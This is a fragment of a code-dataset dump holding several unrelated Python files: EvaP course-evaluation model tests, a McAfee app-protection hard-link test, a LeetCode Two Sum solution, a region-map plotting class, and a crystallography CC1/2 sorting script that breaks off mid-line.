self.assertTrue(course.general_contribution_has_questionnaires)\n self.assertFalse(course.all_contributions_have_questionnaires)\n\n responsible_contribution.questionnaires.add(questionnaire)\n self.assertTrue(course.general_contribution_has_questionnaires)\n self.assertTrue(course.all_contributions_have_questionnaires)\n\n def test_deleting_last_modified_user_does_not_delete_course(self):\n user = mommy.make(UserProfile)\n course = mommy.make(Course, last_modified_user=user)\n user.delete()\n self.assertTrue(Course.objects.filter(pk=course.pk).exists())\n\n def test_responsible_contributors_ordering(self):\n course = mommy.make(Course)\n responsible1 = mommy.make(UserProfile)\n responsible2 = mommy.make(UserProfile)\n contribution1 = mommy.make(Contribution, course=course, contributor=responsible1, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS, order=0)\n mommy.make(Contribution, course=course, contributor=responsible2, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS, order=1)\n\n self.assertEqual(list(course.responsible_contributors), [responsible1, responsible2])\n\n contribution1.order = 2\n contribution1.save()\n\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(list(course.responsible_contributors), [responsible2, responsible1])\n\n def test_single_result_can_be_deleted_only_in_reviewed(self):\n responsible = mommy.make(UserProfile)\n course = mommy.make(Course, semester=mommy.make(Semester), is_single_result=True)\n contribution = mommy.make(Contribution,\n course=course, contributor=responsible, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS,\n questionnaires=[Questionnaire.single_result_questionnaire()]\n )\n mommy.make(RatingAnswerCounter, answer=1, count=1, question=Questionnaire.single_result_questionnaire().questions.first(), contribution=contribution)\n course.single_result_created()\n course.publish()\n course.save()\n\n self.assertTrue(Course.objects.filter(pk=course.pk).exists())\n self.assertFalse(course.can_manager_delete)\n\n course.unpublish()\n self.assertTrue(course.can_manager_delete)\n\n RatingAnswerCounter.objects.filter(contribution__course=course).delete()\n course.delete()\n self.assertFalse(Course.objects.filter(pk=course.pk).exists())\n\n def test_single_result_can_be_published(self):\n \"\"\" Regression test for #1238 \"\"\"\n responsible = mommy.make(UserProfile)\n single_result = mommy.make(Course,\n semester=mommy.make(Semester), is_single_result=True, _participant_count=5, _voter_count=5\n )\n contribution = mommy.make(Contribution,\n course=single_result, contributor=responsible, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS,\n questionnaires=[Questionnaire.single_result_questionnaire()]\n )\n mommy.make(RatingAnswerCounter, answer=1, count=1, question=Questionnaire.single_result_questionnaire().questions.first(), contribution=contribution)\n\n single_result.single_result_created()\n single_result.publish() # used to crash\n\n def test_adding_second_voter_sets_can_publish_text_results_to_true(self):\n student1 = mommy.make(UserProfile)\n student2 = mommy.make(UserProfile)\n course = mommy.make(Course, participants=[student1, student2], voters=[student1], state=\"in_evaluation\")\n course.save()\n top_general_questionnaire = mommy.make(Questionnaire, type=Questionnaire.TOP)\n mommy.make(Question, questionnaire=top_general_questionnaire, type=Question.LIKERT)\n course.general_contribution.questionnaires.set([top_general_questionnaire])\n\n self.assertFalse(course.can_publish_text_results)\n\n let_user_vote_for_course(self.app, student2, course)\n course = Course.objects.get(pk=course.pk)\n\n self.assertTrue(course.can_publish_text_results)\n\n def test_textanswers_get_deleted_if_they_cannot_be_published(self):\n student = mommy.make(UserProfile)\n course = mommy.make(Course, state='reviewed', participants=[student], voters=[student], can_publish_text_results=False)\n questionnaire = mommy.make(Questionnaire, type=Questionnaire.TOP)\n question = mommy.make(Question, type=Question.TEXT, questionnaire=questionnaire)\n course.general_contribution.questionnaires.set([questionnaire])\n mommy.make(TextAnswer, question=question, contribution=course.general_contribution)\n\n self.assertEqual(course.textanswer_set.count(), 1)\n course.publish()\n self.assertEqual(course.textanswer_set.count(), 0)\n\n def test_textanswers_do_not_get_deleted_if_they_can_be_published(self):\n student = mommy.make(UserProfile)\n student2 = mommy.make(UserProfile)\n course = mommy.make(Course, state='reviewed', participants=[student, student2], voters=[student, student2], can_publish_text_results=True)\n questionnaire = mommy.make(Questionnaire, type=Questionnaire.TOP)\n question = mommy.make(Question, type=Question.TEXT, questionnaire=questionnaire)\n course.general_contribution.questionnaires.set([questionnaire])\n mommy.make(TextAnswer, question=question, contribution=course.general_contribution)\n\n self.assertEqual(course.textanswer_set.count(), 1)\n course.publish()\n self.assertEqual(course.textanswer_set.count(), 1)\n\n def test_hidden_textanswers_get_deleted_on_publish(self):\n student = mommy.make(UserProfile)\n student2 = mommy.make(UserProfile)\n course = mommy.make(Course, state='reviewed', participants=[student, student2], voters=[student, student2], can_publish_text_results=True)\n questionnaire = mommy.make(Questionnaire, type=Questionnaire.TOP)\n question = mommy.make(Question, type=Question.TEXT, questionnaire=questionnaire)\n course.general_contribution.questionnaires.set([questionnaire])\n mommy.make(TextAnswer, question=question, contribution=course.general_contribution, answer=\"hidden\", state=TextAnswer.HIDDEN)\n mommy.make(TextAnswer, question=question, contribution=course.general_contribution, answer=\"published\", state=TextAnswer.PUBLISHED)\n mommy.make(TextAnswer, question=question, contribution=course.general_contribution, answer=\"private\", state=TextAnswer.PRIVATE)\n\n self.assertEqual(course.textanswer_set.count(), 3)\n course.publish()\n self.assertEqual(course.textanswer_set.count(), 2)\n self.assertFalse(TextAnswer.objects.filter(answer=\"hidden\").exists())\n\n def test_original_textanswers_get_deleted_on_publish(self):\n student = mommy.make(UserProfile)\n student2 = mommy.make(UserProfile)\n course = mommy.make(Course, state='reviewed', participants=[student, student2], voters=[student, student2], can_publish_text_results=True)\n questionnaire = mommy.make(Questionnaire, type=Questionnaire.TOP)\n question = mommy.make(Question, type=Question.TEXT, questionnaire=questionnaire)\n course.general_contribution.questionnaires.set([questionnaire])\n mommy.make(TextAnswer, question=question, contribution=course.general_contribution, answer=\"published answer\", original_answer=\"original answer\", state=TextAnswer.PUBLISHED)\n\n self.assertEqual(course.textanswer_set.count(), 1)\n self.assertFalse(TextAnswer.objects.get().original_answer is None)\n course.publish()\n self.assertEqual(course.textanswer_set.count(), 1)\n self.assertTrue(TextAnswer.objects.get().original_answer is None)\n\n def test_publishing_and_unpublishing_effect_on_template_cache(self):\n student = mommy.make(UserProfile)\n course = mommy.make(Course, state='reviewed', participants=[student], voters=[student], can_publish_text_results=True)\n\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"en\", True)))\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"en\", False)))\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"de\", True)))\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"de\", False)))\n\n course.publish()\n\n self.assertIsNotNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"en\", True)))\n self.assertIsNotNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"en\", False)))\n self.assertIsNotNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"de\", True)))\n self.assertIsNotNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"de\", False)))\n\n course.unpublish()\n\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"en\", True)))\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"en\", False)))\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"de\", True)))\n self.assertIsNone(caches['results'].get(get_course_result_template_fragment_cache_key(course.id, \"de\", False)))\n\n\nclass TestUserProfile(TestCase):\n\n def test_is_student(self):\n some_user = mommy.make(UserProfile)\n self.assertFalse(some_user.is_student)\n\n student = mommy.make(UserProfile, courses_participating_in=[mommy.make(Course)])\n self.assertTrue(student.is_student)\n\n contributor = mommy.make(UserProfile, contributions=[mommy.make(Contribution)])\n self.assertFalse(contributor.is_student)\n\n semester_contributed_to = mommy.make(Semester, created_at=date.today())\n semester_participated_in = mommy.make(Semester, created_at=date.today())\n course_contributed_to = mommy.make(Course, semester=semester_contributed_to)\n course_participated_in = mommy.make(Course, semester=semester_participated_in)\n contribution = mommy.make(Contribution, course=course_contributed_to)\n user = mommy.make(UserProfile, contributions=[contribution], courses_participating_in=[course_participated_in])\n\n self.assertTrue(user.is_student)\n\n semester_contributed_to.created_at = date.today() - timedelta(days=1)\n semester_contributed_to.save()\n\n self.assertTrue(user.is_student)\n\n semester_participated_in.created_at = date.today() - timedelta(days=2)\n semester_participated_in.save()\n\n self.assertFalse(user.is_student)\n\n def test_can_manager_delete(self):\n user = mommy.make(UserProfile)\n mommy.make(Course, participants=[user], state=\"new\")\n self.assertFalse(user.can_manager_delete)\n\n user2 = mommy.make(UserProfile)\n mommy.make(Course, participants=[user2], state=\"in_evaluation\")\n self.assertFalse(user2.can_manager_delete)\n\n contributor = mommy.make(UserProfile)\n mommy.make(Contribution, contributor=contributor)\n self.assertFalse(contributor.can_manager_delete)\n\n def test_inactive_users_hidden(self):\n active_user = mommy.make(UserProfile)\n mommy.make(UserProfile, is_active=False)\n\n self.assertEqual(list(UserProfile.objects.exclude_inactive_users().all()), [active_user])\n\n def test_inactive_users_shown(self):\n active_user = mommy.make(UserProfile)\n inactive_user = mommy.make(UserProfile, is_active=False)\n\n user_list = list(UserProfile.objects.all())\n self.assertIn(active_user, user_list)\n self.assertIn(inactive_user, user_list)\n\n\nclass ParticipationArchivingTests(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.semester = mommy.make(Semester)\n cls.course = mommy.make(Course, state=\"published\", semester=cls.semester)\n cls.course.general_contribution.questionnaires.set([mommy.make(Questionnaire)])\n\n users = mommy.make(UserProfile, _quantity=3)\n cls.course.participants.set(users)\n cls.course.voters.set(users[:2])\n\n def refresh_course(self):\n \"\"\" refresh_from_db does not work with courses\"\"\"\n self.course = self.semester.courses.first()\n\n def setUp(self):\n self.semester.refresh_from_db()\n self.refresh_course()\n\n def test_counts_dont_change(self):\n \"\"\"\n Asserts that course.num_voters course.num_participants don't change after archiving.\n \"\"\"\n voter_count = self.course.num_voters\n participant_count = self.course.num_participants\n\n self.semester.archive_participations()\n self.refresh_course()\n\n self.assertEqual(voter_count, self.course.num_voters)\n self.assertEqual(participant_count, self.course.num_participants)\n\n def test_participants_do_not_loose_courses(self):\n \"\"\"\n Asserts that participants still participate in their courses after the participations get archived.\n \"\"\"\n some_participant = self.course.participants.first()\n\n self.semester.archive_participations()\n\n self.assertEqual(list(some_participant.courses_participating_in.all()), [self.course])\n\n def test_participations_are_archived(self):\n \"\"\"\n Tests whether participations_are_archived returns True on semesters and courses with archived participations.\n \"\"\"\n self.assertFalse(self.course.participations_are_archived)\n\n self.semester.archive_participations()\n self.refresh_course()\n\n self.assertTrue(self.course.participations_are_archived)\n\n def test_archiving_participations_does_not_change_results(self):\n distribution = calculate_average_distribution(self.course)\n\n self.semester.archive_participations()\n self.refresh_course()\n caches['results'].clear()\n\n new_distribution = calculate_average_distribution(self.course)\n self.assertEqual(new_distribution, distribution)\n\n def test_archiving_participations_twice_raises_exception(self):\n self.semester.archive_participations()\n with self.assertRaises(NotArchiveable):\n self.semester.archive_participations()\n with self.assertRaises(NotArchiveable):\n self.semester.courses.first()._archive_participations()\n\n def test_course_participations_are_not_archived_if_participant_count_is_set(self):\n course = mommy.make(Course, state=\"published\", _participant_count=1, _voter_count=1)\n self.assertFalse(course.participations_are_archived)\n self.assertTrue(course.participations_can_be_archived)\n\n def test_archiving_participations_doesnt_change_single_results_participant_count(self):\n responsible = mommy.make(UserProfile)\n course = mommy.make(Course,\n state=\"published\", is_single_result=True, _participant_count=5, _voter_count=5\n )\n contribution = mommy.make(Contribution, course=course, contributor=responsible, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS)\n contribution.questionnaires.add(Questionnaire.single_result_questionnaire())\n\n course.semester.archive_participations()\n course = Course.objects.get(pk=course.pk)\n self.assertEqual(course._participant_count, 5)\n self.assertEqual(course._voter_count, 5)\n\n\nclass TestLoginUrlEmail(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n cls.other_user = mommy.make(UserProfile, email=\"other@extern.com\")\n cls.user = mommy.make(UserProfile, email=\"extern@extern.com\")\n cls.user.ensure_valid_login_key()\n\n cls.course = mommy.make(Course)\n mommy.make(Contribution, course=cls.course, contributor=cls.user, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS)\n\n cls.template = mommy.make(EmailTemplate, body=\"{{ login_url }}\")\n\n EmailTemplate.objects.filter(name=\"Login Key Created\").update(body=\"{{ user.login_url }}\")\n\n @override_settings(PAGE_URL=\"https://example.com\")\n def test_no_login_url_when_delegates_in_cc(self):\n self.user.delegates.add(self.other_user)\n EmailTemplate.send_to_users_in_courses(self.template, [self.course], EmailTemplate.CONTRIBUTORS, use_cc=True, request=None)\n self.assertEqual(len(mail.outbox), 2)\n self.assertEqual(mail.outbox[0].body, \"\") # message does not contain the login url\n self.assertEqual(mail.outbox[1].body, self.user.login_url) # separate email with login url was sent\n self.assertEqual(len(mail.outbox[1].cc), 0)\n self.assertEqual(mail.outbox[1].to, [self.user.email])\n\n def test_no_login_url_when_cc_users_in_cc(self):\n self.user.cc_users.add(self.other_user)\n EmailTemplate.send_to_users_in_courses(self.template, [self.course], [EmailTemplate.CONTRIBUTORS], use_cc=True, request=None)\n self.assertEqual(len(mail.outbox), 2)\n self.assertEqual(mail.outbox[0].body, \"\") # message does not contain the login url\n self.assertEqual(mail.outbox[1].body, self.user.login_url) # separate email with login url was sent\n self.assertEqual(len(mail.outbox[1].cc), 0)\n self.assertEqual(mail.outbox[1].to, [self.user.email])\n\n def test_login_url_when_nobody_in_cc(self):\n # message is not sent to others in cc\n EmailTemplate.send_to_users_in_courses(self.template, [self.course], [EmailTemplate.CONTRIBUTORS], use_cc=True, request=None)\n self.assertEqual(len(mail.outbox), 1)\n self.assertEqual(mail.outbox[0].body, self.user.login_url) # message does contain the login url\n\n def test_login_url_when_use_cc_is_false(self):\n # message is not sent to others in cc\n self.user.delegates.add(self.other_user)\n EmailTemplate.send_to_users_in_courses(self.template, [self.course], [EmailTemplate.CONTRIBUTORS], use_cc=False, request=None)\n self.assertEqual(len(mail.outbox), 1)\n self.assertEqual(mail.outbox[0].body, self.user.login_url) # message does contain the login url\n\n\nclass TestEmailTemplate(TestCase):\n def test_missing_email_address(self):\n \"\"\"\n Tests that __send_to_user behaves when the user has no email address.\n Regression test to https://github.com/fsr-itse/EvaP/issues/825\n \"\"\"\n user = mommy.make(UserProfile, email=None)\n template = EmailTemplate.objects.get(name=EmailTemplate.STUDENT_REMINDER)\n EmailTemplate.send_to_user(user, template, {}, {}, False, None)\n\n\nclass TestEmailRecipientList(TestCase):\n def test_recipient_list(self):\n course = mommy.make(Course)\n responsible = mommy.make(UserProfile)\n editor = mommy.make(UserProfile)\n contributor = mommy.make(UserProfile)\n mommy.make(Contribution, course=course, contributor=responsible, responsible=True, can_edit=True, textanswer_visibility=Contribution.GENERAL_TEXTANSWERS)\n mommy.make(Contribution, course=course, contributor=editor, can_edit=True)\n mommy.make(Contribution, course=course, contributor=contributor)\n\n participant1 = mommy.make(UserProfile, courses_participating_in=[course])\n participant2 = mommy.make(UserProfile, courses_participating_in=[course])\n course.voters.set([participant1])\n\n recipient_list = EmailTemplate.recipient_list_for_course(course, [], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [])\n\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.RESPONSIBLE], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [responsible])\n\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.EDITORS], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [responsible, editor])\n\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.CONTRIBUTORS], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [responsible, editor, contributor])\n\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.ALL_PARTICIPANTS], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [participant1, participant2])\n\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.DUE_PARTICIPANTS], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [participant2])\n\n def test_recipient_list_filtering(self):\n course = mommy.make(Course)\n\n contributor1 = mommy.make(UserProfile)\n contributor2 = mommy.make(UserProfile, delegates=[contributor1])\n\n mommy.make(Contribution, course=course, contributor=contributor1)\n mommy.make(Contribution, course=course, contributor=contributor2)\n\n # no-one should get filtered.\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.CONTRIBUTORS], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [contributor1, contributor2])\n\n # contributor1 is in cc of contributor2 and gets filtered.\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.CONTRIBUTORS], filter_users_in_cc=True)\n self.assertCountEqual(recipient_list, [contributor2])\n\n contributor3 = mommy.make(UserProfile, delegates=[contributor2])\n mommy.make(Contribution, course=course, contributor=contributor3)\n\n # again, no-one should get filtered.\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.CONTRIBUTORS], filter_users_in_cc=False)\n self.assertCountEqual(recipient_list, [contributor1, contributor2, contributor3])\n\n # contributor1 is in cc of contributor2 and gets filtered.\n # contributor2 is in cc of contributor3 but is not filtered since contributor1 wouldn't get an email at all then.\n recipient_list = EmailTemplate.recipient_list_for_course(course, [EmailTemplate.CONTRIBUTORS], filter_users_in_cc=True)\n self.assertCountEqual(recipient_list, [contributor2, contributor3])\n","sub_path":"evap/evaluation/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":29103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"128228734","text":"#!/usr/bin/python\n# Copyright (C) 2010 McAfee, Inc. All rights reserved.\n# TestcaseID: 17435\n# TestcaseDescription: Application behaviour when hard link is created and app is added to AppPro rule \n\nimport sys\nimport logging\nimport subprocess\nimport os\n\n# Import CommonTest module into current namespace\ncommon_path=os.path.dirname(os.path.abspath(sys.argv[0])) + \"/../\"\nsys.path.append(common_path + \"/Common\")\n\n\nimport commonFns\nimport CommonAppProFns\n# Import CommonTest module into current namespace\nfrom CommonTest import *\n\n# Get testcase name\ntestcaseName = sys.argv[0][:-3]\n\nclass TestCase(BaseTest):\n def __init__(self):\n logging.info(\"TestcaseID : 17435\")\n logging.info(\"Description : Application behaviour when hard link is created and app is added to AppPro rule\")\n\n def init(self):\n logging.info(\"Initializing testcase %s\" % testcaseName)\n _retval = BaseTest.init(self)\n if _retval != 0:\n return 1\n # Install the test tool\n logging.debug(\"Installing appProtTestTool\")\n if CommonAppProFns.installAppProtTestTool() != True :\n logging.error(\"Failed to install appProtTestTool\")\n return 1\n CommonAppProFns.resetAppProtToDefaults()\n self._rule = dict()\n self._binaryPath = os.path.dirname(os.path.abspath(sys.argv[0])) + \"/data/SampleApplications/UDPClient\" \n return 0\n\n def execute(self):\n logging.info(\"Executing testcase %s\" % testcaseName)\n\n # Set exclusion for aptt\n if CommonAppProFns.setAppProExclusions( [ os.path.dirname(os.path.abspath(sys.argv[0])) + \"/data/aptt\" ]) != True:\n logging.error(\"Unable to add aptt exclusion\")\n return 1\n logging.debug(\"Added exclusion for aptt\")\n \n # Set unknown app action to block\n if CommonAppProFns.setUnknownAppAction(2) != True:\n logging.error(\"Unable to set unknown apps to block. Can't proceed\")\n return 1\n logging.debug(\"set unknown app action to deny\")\n \n # Lets Add a rule for UDPClient binary\n self._rule[\"AppPath\"]= self._binaryPath\n self._rule[\"ExecAllowed\"]=\"1\"\n self._rule[\"Enabled\"]=\"1\"\n self._rule[\"NwAction\"]=\"1\"\n _retval= CommonAppProFns.addAppProtRule(self._rule)\n if _retval != CommonAppProFns.SUCCESS:\n logging.error(\"Addition of rule failed with code \" + str(_retval))\n return 1\n\n logging.debug(\"Added rule for UDPClient\")\n # Lets create a hardlink for UDPClient\n retval = subprocess.call( [ \"ln\",\n \"-f\",\n self._binaryPath,\n self._binaryPath+\"_hl\" ] )\n if retval != 0:\n logging.error(\"Hardlink creation failed\")\n return 1\n \n retval = subprocess.call( [ self._binaryPath+\"_hl\",\n \"172.16.193.1\",\n \"500\",\n \"Message\" ])\n if retval != 0:\n logging.error(\"Launching of UDPClient failed\")\n return 1\n\n return 0\n\n def verify(self):\n logging.info(\"Verifying testcase %s\" % testcaseName)\n return 0\n\n def cleanup(self):\n logging.info(\"Performing cleanup for testcase %s\" % testcaseName)\n foundCrash = 0\n foundCrash = commonFns.copyLogs()\n CommonAppProFns.resetAppProtToDefaults()\n # delete the hardlink\n try:\n os.remove(self._binaryPath+\"_hl\")\n except:\n pass\n commonFns.cleanLogs()\n\n if foundCrash != 0:\n logging.error(\"copylogs returned failure status. Maybe a product crash\")\n\n return foundCrash\n\n def __del__(self):\n pass\n\nif __name__ == \"__main__\":\n # Setup testcase\n setupTestcase(sys.argv)\n\n testObj = TestCase()\n\n # Perform testcase operations\n retVal = testObj.init()\n\n # Perform execute once initialization succeeds... \n if(retVal == 0):\n retVal = testObj.execute()\n\n # Once execution succeeds, perform verification...\n if(retVal == 0):\n retVal = testObj.verify()\n\n # Perform testcase cleanup\n retVal += testObj.cleanup()\n\n if(retVal == 0):\n resultString = \"PASS\"\n else:\n resultString = \"FAIL\"\n \n logging.info(\"Result of testcase %s: %s\" % (testcaseName, resultString) )\n sys.exit(retVal)\n","sub_path":"McAfee/src/TestAutomation/Testcases/FVT/AppProtection/Appprot_Adhoc_12.py","file_name":"Appprot_Adhoc_12.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"171929203","text":"# p001 Two Sum\n# Easy\n\n# Given an array of integers, return indices of the two numbers such that they add up to a specific target.\n# You may assume that each input would have exactly one solution, and you may not use the same element twice.\n\n# \"\"\"\n# type nums: List[int]\n# type target: int\n# rtype: List[int]\n# \"\"\"\n \nclass Solution(object):\n def twoSum(self, nums, target): # brutal force, slowest\n for i in nums:\n index_i = nums.index(i)\n for j in nums[index_i+1:]:\n if i + j == target:\n if i != j:\n return [index_i, nums.index(j)]\n else:\n return [index_i, nums.index(i, index_i+1)]\n \n def twoSum2(self, nums, target): # brutal force, check half first\n half = target / 2\n if nums.count(half) == 2:\n indexHalf =nums.index(half)\n return [indexHalf, nums.index(half, indexHalf+1)]\n for i in nums:\n if i != half:\n if target - i in nums:\n return [nums.index(i), nums.index(target - i)]\n\nif __name__ == '__main__':\n assert Solution().twoSum2([11, 2, 7, 15], 9) == [1,2], 'regular'\n assert Solution().twoSum2([11, 7, 2, 15], 9) == [1,2], 'regular revert'\n assert Solution().twoSum2([3, 3], 6) == [0,1], 'two identical'\n assert Solution().twoSum2([-1, -2, -3, -4, -5], -8) == [2, 4], 'negative int'\n assert Solution().twoSum2([3, 2, 4], 6) == [1, 2], 'struggle with 1/2 target'\n print('test done, all passed')\n","sub_path":"LeetCode/p001_two_sum.py","file_name":"p001_two_sum.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"450059800","text":"from Maps.MapFunctions import *\nfrom Maps.baseMap import BaseMap\n\n\nclass LocalMap(BaseMap):\n '''Figure for the map of Asten'''\n\n def getData(self, checkList: list) -> list:\n '''\n :param region: The 'Region' geopandas dataframe\n :param pumps: The 'Pump' geopandas dataframe\n :return: List of shapes to be visualized on a map.\n '''\n # Find the data of the region\n plot_data = []\n region_to_visualize=None\n for index, row in self.geoDict['Region'].iterrows():\n if self.name in row['GAGNAAM']:\n region_to_visualize = row\n\n # Get the outline cords and create an (filled) outline of the region\n if region_to_visualize.geometry.type == 'MultiPolygon':\n x = [transformCoords(poly).exterior.xy[0] for poly in region_to_visualize['geometry']]\n y = [transformCoords(poly).exterior.xy[1] for poly in region_to_visualize['geometry']]\n for i in range(len(x)):\n plot_data.append(createRegionShape(x[i], y[i], region_to_visualize))\n else:\n x, y = transformCoords(region_to_visualize.geometry).exterior.xy\n plot_data.append(createRegionShape(x, y, region_to_visualize))\n\n if 'treat' in checkList:\n # Add a marker for the treatment plant of the region if the user choose to plot treatment plants\n treatment_plant= None\n for index, row in self.geoDict['WWTP'].iterrows():\n if self.name in row['ZRWNAAM']:\n treatment_plant = row\n plot_data.append(createTreatmentMarker(treatment_plant))\n\n if 'pump' in checkList:\n # Look and map all known pumps if the user chose to plot treatment plants\n for index, row in self.geoDict['Pump'].iterrows():\n # If a pump has no location, skip it\n if row['geometry'] is None:\n continue\n # Create a pump marker for every pump that's in the region area\n if row['geometry'].within(region_to_visualize['geometry']):\n plot_data.append(createMarker(row))\n\n if 'sub' in checkList:\n # Look and map all the subregions is the user chose\n for index, row in self.geoDict['Subregion'].iterrows():\n # If a subregion has no geometry, skip it\n if row['geometry'] is None:\n continue\n # Create a subregion shape for every pump that's in the region area\n if row['geometry'].within(region_to_visualize['geometry']):\n if row.geometry.type == 'MultiPolygon':\n x = [transformCoords(poly).exterior.xy[0] for poly in row['geometry']]\n y = [transformCoords(poly).exterior.xy[1] for poly in row['geometry']]\n for i in range(len(x)):\n plot_data.append(createRegionShape(x[i], y[i], row))\n else:\n x, y = transformCoords(row.geometry).exterior.xy\n plot_data.append(createRegionShape(x, y, row, True))\n return plot_data","sub_path":"Maps/LocalMap.py","file_name":"LocalMap.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"333521770","text":"# free to use or modify\n# Authors: \n# Qun Liu: qun.liu@gmail.com\n# Lina Takamaru: llt45@cornell.edu\n# References: J. Appl. Cryst. (2020). 53 https://doi.org/10.1107/S160057671901673X\nimport math, re, os, sys, glob, pprint, argparse\n\n## write for_sorting.tmp2 and data_with_frame_selected.txt files \ndef createFs(dir_output, dataprefix='Puck', cc_cutoff=0.4):\n\tos.chdir(dir_output)\n\t#print \"cctes\", os.getcwd()\n\tcheck = [dir_output+\"/for_sorting.tmp2\", dir_output+\"/data_with_frame_selected.txt\"]\n\tfor files in check:\n\t\tif os.path.exists(files):\n\t\t\tos.remove(files)\n\n\t#pFiles is a list of folders beginning with Puck\n\t#pFiles = glob.glob('../Puck*')\n#\tpFiles=[]\n#\tlist_file = dataprefix.split(' ')\n#\tprint(\"list_file\", list_file)\n#\tfor list_file in list(dataprefix):\n#\t\tpFiles.append(glob.glob(list_file+\"*\"))\n\tpFiles = glob.glob(dataprefix+\"*\")\n\t#print(\"directories\", pFiles)\n\twedges = []\n\tmaxFiles = []\n\toutput = open(dir_output+\"/for_sorting.tmp2\", \"a\")\n\t#glob returns a list, so make sure it is not empty before continuing\n\tif len(pFiles) != 0:\n\t\t#dictionary that contains the file name, wedges, max cc12\n\t\tcc12 = {}\n\t\t#dictionary that contains file names of max cc \n\t\tfilesC = {}\n\t\tfor folder in pFiles:\n\t\t\t#items is a list of files in the current folder\n\t\t\titems = os.listdir(folder)\n\t\t\tmaxcc = -1\n\t\t\tfor files in items:\n\t\t\t\tif files.startswith('aimless'):\n\t\t\t\t\twith open(os.path.join(folder, files)) as f:\n\t\t\t\t\t\tcontent = f.read().strip()\n\t\t\t\t\tif 'Mn(I) half-set correlation CC(1/2)' in content:\n\t\t\t\t\t\tstore = content.index('Mn(I) half-set correlation CC(1/2)')\n\t\t\t\t\t\tlast = content.index('Completeness', store)\n\t\t\t\t\t\tnewstr = content[store:last-1]\n\t\t\t\t\t\tlastp = newstr.rfind(')')\n\t\t\t\t\t\tnewstr = newstr[lastp+1:].strip()\n\t\t\t\t\t\tspace = newstr.find(' ')\n\t\t\t\t\t\tcc = float(newstr[:space+1].strip())\n\t\t\t\t\t\tif cc > maxcc:\n\t\t\t\t\t\t\tmaxcc = cc\n\t\t\t\t\t\t\tdot = files.find('.')\n\t\t\t\t\t\t\tunders = files.rfind('_')\n\t\t\t\t\t\t\twedge = int(files[unders+1:dot])\n\t\t\t\t\t\t\twedges.append(wedge)\n\t\t\t\t\t\t\tfilesC[folder] = [wedge, maxcc, files]\n\t\t\t\t\t\t\tcc12[folder]=[wedge, maxcc,files]\n\t\tx = pprint.pformat(cc12)\n\t\toutput.write(x)\n\toutput.close()\n\t##\n\tsortedfile = open(dir_output+\"/data_with_frame_selected.txt\", \"a\")\n\t#contains the files in addition to wedge and maxcc\n\tsorted2 = sorted(filesC.items(), key=lambda x: x[1][1], reverse=True)\n\t#cc12 sorted by cc1/2, then by file number\n\tcc12_sorted = sorted(cc12.items(), key=lambda x: (-x[1][1], x[0][-3:]))\n\n\t#cc12sorted only includes data with cc12 values greater than min cc cutoff\n\tcc12sorted_index=[d for d in range(len(cc12_sorted)) if float(cc12_sorted[d][1][1]) > float(cc_cutoff)]\n\tcc12sorted=[cc12_sorted[e] for e in cc12sorted_index]\n\tout = pprint.pformat(cc12sorted)\n\tsortedfile.write(out)\n\tsortedfile.close()\n\treturn cc12sorted\n\n## write unit_cell.txt and unit_cell.txt2 \ndef createAUC1(dir_output,dataprefix, cc_cutoff):\n\tcwd = os.getcwd()\n\n\tcheck=[dir_output+\"/unit_cell.txt\", dir_output+\"/unit_cell.txt2\",dir_output+\"/check.txt\"]\n\tfor files in check:\n\t\tif os.path.exists(files):\n\t\t\tos.remove(files)\n\t\n\tauc = open(dir_output+\"/unit_cell.txt\", \"a\")\n\taucRed = open(dir_output + \"/unit_cell.txt2\", \"a\")\n\tout = []\n\n\tx=0\n\tcc12sorted = createFs(dir_output,dataprefix, cc_cutoff)\n\tfor items in cc12sorted:\n\t\twith open(cwd +'/' + cc12sorted[x][0] + \"/\" + cc12sorted[x][1][2]) 